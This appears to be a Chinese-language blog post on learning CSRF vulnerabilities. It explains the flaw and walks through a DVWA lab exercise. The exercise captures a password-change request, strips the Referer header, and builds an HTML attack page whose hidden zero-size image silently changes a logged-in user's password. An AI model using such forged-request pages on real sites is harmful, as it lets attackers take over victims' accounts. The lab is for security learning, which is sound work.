美文网首页
CSRF漏洞学习

CSRF漏洞学习

作者: yytester | 来源:发表于2018-07-05 22:23 被阅读13次

CSRF漏洞原理

web应用程序在用户进行敏感操作时,如修改账号密码,添加账号,转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用被攻击者的身份完成对应的而已请求.


CSRF练习

  1. 打开dvwa测试系统,登录.
  2. 打开抓包工具,进入CSRF练习页面,修改密码,提交
  3. 修改抓取的报文,删除referer字段,重新提交.
  4. 修改密码成功,说明存在CSRF漏洞.
  5. 构造攻击页面,代码:
<!DOCTYPE HTML PUBLIC "-//w3c/DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWAP CRSFTester Demonstration</title>
</head>

<body>
 <h2>OWASP CRSFTester Demonstration</h2>
 <img src="http://xx.xxx.xx.x:8080/dvwa/vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=%B8%FC%B8%C4" width="0" height="0" border="0"/>
</body>
</html>

  1. 点击攻击页面.html文件. 因为用户处于登录dvwa系统的状态,通过抓包可以看到此时会自动填充Cookie等信息,自动修改用户密码成功.


    image.png

相关文章

  • CSRF漏洞学习

    CSRF漏洞原理 web应用程序在用户进行敏感操作时,如修改账号密码,添加账号,转账等,没有校验表单token或者...

  • 安全包开发整体架构

    SSRF防御 SSRF安全漏洞以及防御实现 XSS防御 xss漏洞以及防御实现 CSRF防御 CSRF安全漏洞以及...

  • CSRF(跨站请求伪造)漏洞

    CSRF漏洞概述 CSRF是OWASP TOP10报告中危害较高的漏洞。 Cross-site request f...

  • DWVA手把手教程(三)——CSRF漏洞

    欢迎来到CSRF漏洞章节,在此,请允许作为#灵魂画师!!#的我图文并茂的为大家简单介绍一下CSRF漏洞: CSRF...

  • CRSF

    CSRF漏洞概述 Cross-site request forgery简称为“CSRF",在CSRF的攻击场景中攻...

  • Web 开发常见安全问题

    前端安全XSS 漏洞CSRF 漏洞 后端安全SQL 注入漏洞权限控制漏洞SESSION 与 COOKIEIP 地址...

  • CSRF 漏洞

    相关课程的线上实验版本已投递到实验楼,实验楼在线教育平台提供非常优秀的在线实验环境,建议有兴趣的朋友可以看看:点击...

  • CSRF漏洞

    特别声明:该文章只运用于学习安全测试交流之用,请勿用于其他 CSRF(Cross-site request for...

  • CSRF漏洞

    CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Atta...

  • CSRF漏洞

    漏洞原理: csrf全名为跨站请求伪造,是一种对网站的恶意利用,虽然听起来和xss很像,但是它们俩还是有很大的区别...

网友评论

      本文标题:CSRF漏洞学习

      本文链接:https://www.haomeiwen.com/subject/jywpuftx.html